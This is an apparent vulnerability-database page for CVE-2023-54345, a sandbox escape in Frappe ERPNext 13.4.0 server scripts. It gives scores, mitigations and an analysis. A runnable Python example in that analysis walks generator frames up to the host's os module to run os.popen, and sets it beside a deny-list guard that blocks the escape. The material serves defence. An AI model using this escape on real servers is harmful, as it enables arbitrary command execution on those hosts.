Cyber Posture

CVE-2023-54345

Severity: High · Public PoC · RCE

Published: 05 May 2026
Modified: 05 May 2026
KEV Added: not listed
Patch: no patch reference recorded
CVSS Score: 8.8 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
EPSS Score: 0.0010 (27.4th percentile)
Risk Priority: 18 (weighted 60% EPSS · 20% KEV · 20% CVSS)

Summary

CVE-2023-54345 is a high-severity Code Injection (CWE-94) vulnerability in Frappe Erpnext. Its CVSS base score is 8.8 (High).

Operationally, its EPSS score of 0.0010 places it at the 27.4th percentile for exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced. Note that System Manager is an administrative role in ERPNext, so in practice the attacker is a compromised or malicious administrator rather than an ordinary authenticated user.

The strongest mitigations our analysis identified are NIST 800-53 AC-6 (Least Privilege) and SC-39 (Process Isolation).

Threat & Defense Details

Mitigating Controls (NIST 800-53 r5, AI)

prevent: Directly remediates the sandbox escape flaw in Frappe's safe_exec.py (the wrapper around RestrictedPython), preventing arbitrary code execution via frame introspection.

prevent (AC-6, Least Privilege): Restricts which System Manager accounts may reach the /app/server-script endpoint and create server scripts, so that authenticated exploitation requires a tightly held privilege rather than any administrator login.

prevent (SC-39, Process Isolation): Runs server scripts outside the web worker process, so that a script which traverses the call stack cannot reach the host interpreter's modules or invoke os.popen with the worker's privileges.

NVD Description

Frappe Framework ERPNext 13.4.0 contains a sandbox escape vulnerability in RestrictedPython that allows authenticated users with System Manager role to execute arbitrary code by exploiting frame introspection. Attackers can create a server script via the /app/server-script endpoint and access the gi_frame attribute to traverse the call stack and invoke os.popen to execute system commands.

Deeper analysis (AI)

CVE-2023-54345 is a sandbox escape in the RestrictedPython-based server-script sandbox of Frappe Framework / ERPNext 13.4.0. An authenticated user holding the System Manager role can bypass the sandbox restrictions and execute arbitrary code through frame introspection in a server script.

The attacker creates a server script via the /app/server-script endpoint. Inside the script, the gi_frame attribute of a generator exposes a live interpreter frame; following f_back walks up the call stack into the unrestricted host frames, whose globals expose modules the sandbox never imported, so functions such as os.popen can be invoked to run system commands. The result is full compromise of confidentiality, integrity and availability, reflected in the CVSS v3.1 base score of 8.8 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) and the mapping to CWE-94 (Code Injection).
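The escape described above, modelled in Python as an added example (not code from Frappe, ERPNext or RestrictedPython), beside a guard that closes it. Assumptions not stated on the page: RestrictedPython compiles each attribute read `obj.attr` into a hook call `_getattr_(obj, "attr")`, which a small ast rewrite reproduces here so the script runs without RestrictedPython installed; the weak guard models a policy that only rejects underscore-prefixed names; the UNSAFE_ATTRIBUTES deny-list is the editor's own, not the project's fix. The constructed user script runs `echo` through os.popen to show that it reached the host process.

```python
"""Model of the generator-frame escape and a guard that closes it.

Added example; not code from Frappe, ERPNext or RestrictedPython.
Assumption: RestrictedPython compiles `obj.attr` into `_getattr_(obj, "attr")`;
the ast rewrite below reproduces that so the example runs stand-alone.
"""
import ast
import os  # lives in the host module's globals: this is what the escape reaches


class _AttrRewriter(ast.NodeTransformer):
    """Rewrite attribute reads `a.b` into `_getattr_(a, "b")`."""

    def visit_Attribute(self, node):
        self.generic_visit(node)  # rewrite inner `a.b` before outer `a.b.c`
        if not isinstance(node.ctx, ast.Load):
            return node
        call = ast.Call(
            func=ast.Name(id="_getattr_", ctx=ast.Load()),
            args=[node.value, ast.Constant(node.attr)],
            keywords=[],
        )
        return ast.copy_location(call, node)


def compile_restricted(source):
    """Compile a user script with every attribute read routed through _getattr_."""
    tree = _AttrRewriter().visit(ast.parse(source))
    ast.fix_missing_locations(tree)
    return compile(tree, "<server-script>", "exec")


def weak_getattr(obj, name):
    """Underscore-only rule (assumed): blocks obj._x, but not obj.gi_frame."""
    if name.startswith("_"):
        raise AttributeError(f"attribute {name!r} is not allowed")
    return getattr(obj, name)


# Attributes that hop from a user-visible object to interpreter frames, code
# objects or module globals. Editor's own deny-list, not the project's fix.
UNSAFE_ATTRIBUTES = frozenset({
    "gi_frame", "gi_code", "gi_yieldfrom",                       # generators
    "cr_frame", "cr_code", "ag_frame", "ag_code",                # coroutines
    "f_back", "f_globals", "f_locals", "f_builtins", "f_code",   # frames
    "co_code", "co_consts", "tb_frame", "tb_next",               # code, tracebacks
})


def hardened_getattr(obj, name):
    """Deny-list guard: underscore names plus the introspection hops above."""
    if name.startswith("_") or name in UNSAFE_ATTRIBUTES:
        raise AttributeError(f"attribute {name!r} is not allowed")
    return getattr(obj, name)


# Constructed user script in the shape the advisory describes: while a
# generator is running, its frame's f_back is the caller's frame, so two hops
# up from the generator we are in run_user_script() and can read its globals.
ESCAPE_SCRIPT = """
def gen():
    yield gen_obj.gi_frame.f_back        # frame of this user script (caller of send)

gen_obj = gen()
script_frame = gen_obj.send(None)
host_frame = script_frame.f_back         # frame of run_user_script(), which called exec
host_os = host_frame.f_globals["os"]     # imported by the host, never by the script
result = host_os.popen("echo escaped").read().strip()
"""


def run_user_script(source, getattr_guard):
    """Execute a user script with empty builtins and the given attribute guard."""
    namespace = {"__builtins__": {}, "_getattr_": getattr_guard}
    exec(compile_restricted(source), namespace)
    return namespace


def demo_escape(getattr_guard):
    """Return ("escaped", command output) or ("blocked", guard message)."""
    try:
        namespace = run_user_script(ESCAPE_SCRIPT, getattr_guard)
        return "escaped", namespace["result"]
    except AttributeError as exc:
        return "blocked", str(exc)


if __name__ == "__main__":
    print("weak guard     :", demo_escape(weak_getattr))
    print("hardened guard :", demo_escape(hardened_getattr))
```

The deny-list is the in-process fix the advisory implies; it is defence in depth, not a boundary. Any attribute hop the list misses reopens the path, which is why the SC-39 recommendation (run scripts in a separate, low-privilege process) matters independently of the guard.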

References point to the ERPNext site, Frappe Framework documentation on server scripting, a GitHub gist, the Frappe repository, and the vulnerable safe_exec.py source file at line 42 in v13.4.0, which handles the RestrictedPython execution environment.

Details

CWE(s): CWE-94 (Code Injection)

Affected Products: frappe / erpnext 13.4.0

CVEs Like This One

CVE-2025-66434 (same product: Frappe Erpnext)
CVE-2025-66437 (same product: Frappe Erpnext)
CVE-2026-27471 (same product: Frappe Erpnext)
CVE-2026-32954 (same product: Frappe Erpnext)
CVE-2025-65267 (same product: Frappe Erpnext)
CVE-2026-31017 (same product: Frappe Erpnext)
CVE-2025-67289 (same product: Frappe Erpnext)
CVE-2026-29077 (same vendor: Frappe)
CVE-2026-39351 (same vendor: Frappe)
CVE-2025-55006 (same vendor: Frappe)
